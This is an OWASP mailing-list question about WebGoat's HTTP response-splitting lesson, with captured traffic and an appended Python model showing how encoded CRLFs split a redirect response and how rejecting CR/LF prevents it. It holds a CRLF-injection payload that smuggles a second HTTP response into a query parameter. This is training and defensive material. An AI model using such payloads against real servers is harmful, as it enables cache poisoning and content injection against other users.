[Owasp-cincinnati] WebGoat HTTP Splitting Attack Question

Zhou, Yan yzhou at medplus.com
Fri Jul 18 09:46:52 EDT 2008


Hi there,

Although I successfully completed the HTTP Splitting Attack in WebGoat 5.2,
I did not understand the step-by-step behavior of the attack. I am using
WebScarab to capture all requests & responses to give me a better idea.

For example, what does the browser do with the 2nd "made-up" response?
Here is what I did for testing.

First, I put in the query parameter exactly as it is given in the hint:

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK
%0d%0aContent- .........

 

This is the response I got from the server below:

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location:
http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&langu
age=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%
20OK%0d%0aLast-Modified:%20Wed,%2016%20Jul%202018%2012:55:46%20GMT%0d%0a
Content-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Ins
ert undesireable content here</html>
Content-Type: text/html;charset=ISO-8859-1
Content-length: 0
Date: Wed, 16 Jul 2008 13:47:47 GMT

Notice that the response does not appear to be split; the 2nd injected
response is still part of the query parameter, as shown in the "Location"
header. Is this a display issue, or am I missing something?

 

The browser then generates the next GET request; everything I injected
is now part of the GET parameter (if the response were split, I would not
see the injected content being part of the query parameter, right?)

 

GET
http://localhost:80/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&la
nguage=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%202
00%2
<http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&lang
uage=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200
%252> ...........

 

Then, the response from the server: the server should respond to the above
GET request, right? But here is what I see; notice that it is DIFFERENT
from what I injected because of the additional headers.

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Content-Type: text/html
X-Transfer-Encoding: chunked
Date: Fri, 18 Jul 2008 13:28:52 GMT
Content-length: 45

<html>Insert undesireable content here</html>

 

My questions are:

1. I would hope to see two responses split in the middle like this. I do
not know if this is just a matter of display (since the attack was
successful):

        HTTP/1.1 200 OK
        ...
        Set-Cookie: author=Wiley Hacker

        HTTP/1.1 200 OK
        ...

2. Why is there no response to the 2nd GET request, but a similar
response to my injected text?

 

Thanks,

Yan Zhou
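As an added illustration (not part of Yan Zhou's post or of WebGoat's own code), the Python below models the two cases the captured traffic raises: a redirect whose Location keeps the %0d%0a sequences percent-encoded parses as a single response, while a server that URL-decodes the parameter straight into the header emits a byte stream a client reads as two responses, the injected "Content-Length: 0" ending the first one. The URL, parameter layout and body text follow the post; the CR/LF check in `safe_header_value` is the usual server-side fix and is my addition.

```python
from urllib.parse import unquote

CRLF = "\r\n"
BODY = "<html>Insert undesireable content here</html>"  # body text as quoted in the post
# Constructed parameter modelled on the WebGoat hint: "Content-Length: 0" closes the
# real response, then a complete second response follows it.
INJECTED = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
            f"Content-Type:%20text/html%0d%0aContent-Length:%20{len(BODY)}%0d%0a%0d%0a{BODY}")

def safe_header_value(value: str) -> str:
    """Server-side fix: a header value must never contain a bare CR or LF."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in header value")
    return value

def build_redirect(language: str, decode_into_header: bool, harden: bool = False) -> bytes:
    """Emit a WebGoat-style 302 whose Location echoes the language parameter.
    decode_into_header=False mirrors the capture in the post: %0d%0a stays encoded,
    so Location is one long line. True is the vulnerable pattern: the parameter is
    URL-decoded and its raw CRLFs are written straight into the header."""
    value = unquote(language) if decode_into_header else language
    if harden:
        value = safe_header_value(value)
    location = f"http://localhost/WebGoat/attack?Screen=2&menu=100&language={value}"
    return (f"HTTP/1.1 302 Moved Temporarily{CRLF}Location: {location}{CRLF}"
            f"Content-Type: text/html{CRLF}Content-Length: 0{CRLF}{CRLF}").encode("latin-1")

def parse_responses(raw: bytes) -> list:
    """Read the stream the way a browser or proxy does: status line, headers, then
    exactly Content-Length body bytes, repeated while another status line follows.
    Returns (status, headers, body) tuples; a single tuple means nothing was split."""
    responses, pos = [], 0
    while True:
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        lines = raw[pos:head_end].decode("latin-1").split(CRLF)
        if not lines[0].startswith("HTTP/1."):
            break  # stray bytes (here the server's own trailing headers), not a response
        headers = {}
        for line in lines[1:]:
            name, _, val = line.partition(":")
            headers[name.strip().lower()] = val.strip()
        body_start = head_end + 4
        body_end = body_start + int(headers.get("content-length", "0"))
        responses.append((lines[0], headers, raw[body_start:body_end]))
        pos = body_end
    return responses
```

Running `parse_responses` over `build_redirect(INJECTED, False)` yields one response, matching the single 302 seen in WebScarab, while `build_redirect(INJECTED, True)` yields two, and the hardened variant refuses the value outright.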